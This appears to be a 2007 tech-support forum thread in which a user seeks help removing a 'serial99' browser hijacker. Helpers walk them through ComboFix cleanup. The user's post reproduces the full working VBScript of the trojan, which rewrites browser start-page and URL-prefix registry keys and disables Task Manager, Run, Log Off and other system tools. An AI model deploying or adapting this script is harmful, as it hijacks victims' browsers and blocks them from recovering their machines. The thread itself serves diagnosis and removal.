Serial99 hijack

Status
Not open for further replies.
M

M1245456

Posts: 7   +0
Hi, I got the www serial99.com/?a infection where it redirected me to that url each time, it also disabled Run, Task manager, recent docs, etc.

There is this new avpm.vbs file in my C drive, I don't know if I can just delete it or have to run a fix? (I just renamed it to .txt so you can look at it and my virus scanner says it's trojan.vbs.disabler.b):


wscript.echo "Cracking... now! Click here for crack!"
itemtype = "REG_SZ"
mustboot = "www serial99.com"
jobfunc = "CRACKED!"
t = "Successfull!"
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
Set Kaspersky = WScript.CreateObject("WScript.Shell")
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Window Title", "Serial99.com","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","www serial99.com/?","REG_SZ"
Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRecentDocsMenu", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoClose", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"



-----------

Rootkit scan didn't find anything
I'm guessing to fix my the recent docs etc. I just have to change these? :


[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"=0 (0x0)
"DisableTaskMgr"=0 (0x0)

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoViewOnDrive"=0 (0x0)
"NoLogoff"=1
"NoRun"=1
"NoFind"=1
"NoRecentDocsMenu"=1
"NoClose"=1


----------

Also when I ran the AVG anti-spyware my kaspersky picked up Backdoor.win32.sdbot.cic and deleted it.

By the way before I came to this site I ran DSS (Deckard's System Scanner)
which I think is based on combo fix so I'm including the log as it shows the hijackthis stuff that was removed, and the stuff combo fix would have done. (sry about this I know u don't want extra logs)
 

Attachments

  • ComboFix.txt
    13.3 KB · Views: 8
  • AVG - Report-Scan-20071119-163039.txt
    1.2 KB · Views: 5
Open notepad and copy/paste the text in the code box below into it:
NOTE* make sure to only highlight and copy what is inside the quote box nothing out side of it.
Also ..

Pay particular attention to this :-

Make sure the word File:: is on the first line of the text file you save (no blank line above it, & no space in front of it)
Code:


File::
C:\WINDOWS\iun6002.exe
C:\WINDOWS\Setup1.exe
C:\WINDOWS\ST6UNST.EXE
C:\avpm.vbs
C:\drmHeader.bin
C:\WINDOWS\system32\abcccbbf_s.dll
C:\WINDOWS\system32\gfhkj.bak2

Folder::
C:\VundoFix Backups
Click to expand...


Save this as CFScript.txt

Then drag the CFScript.txt into ComboFix.exe as you see in the screenshot below.

CFScript.gif


This will start ComboFix again. After reboot, (in case it asks to reboot), post the contents of Combofix.txt in your next reply together with a fresh HJT log.

Regards Howard :)

This thread is for the use of M1245456 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
That is not a full Combofix log.

You need to run Combofix again and post the resulting log file.

Regards Howard :)

This thread is for the use of M1245456 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
Hi, combofix kept freezing on 'creating log', here's the dss scan (it doesn't seem to have created an extra.txt, just a main)
 
Your log file looks fine.

Unless you`re still having problems, you should be good to go.

Click start/run and type combofix /u into the run box and hit the enter key. That should delete Combofix and all it`s folders etc.

Turn off system restore.(XP/ME only) See how HERE.

Now, turn system restore back on. This will have deleted all your old restore points and any nasties that are in them. It will also have created a new, clean restore point.


If you have any further virus/spyware problems, please post in this thread.

Regards Howard :)

This thread is for the use of M1245456 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
Status
Not open for further replies.

Similar threads

wshknwntlprtmn
  • Locked
Inactive Not sure what's going on here....
Replies
12
Views
2K
Broni
Broni
L
Solved Unknown spyware/ Monitoring/ Hijacking of my devices
Replies
15
Views
3K
Broni
Broni
E
Solved Svchost.exe launching multiple iexplore.exe - unknown cause
Replies
23
Views
3K
Broni
Broni

Latest posts

Back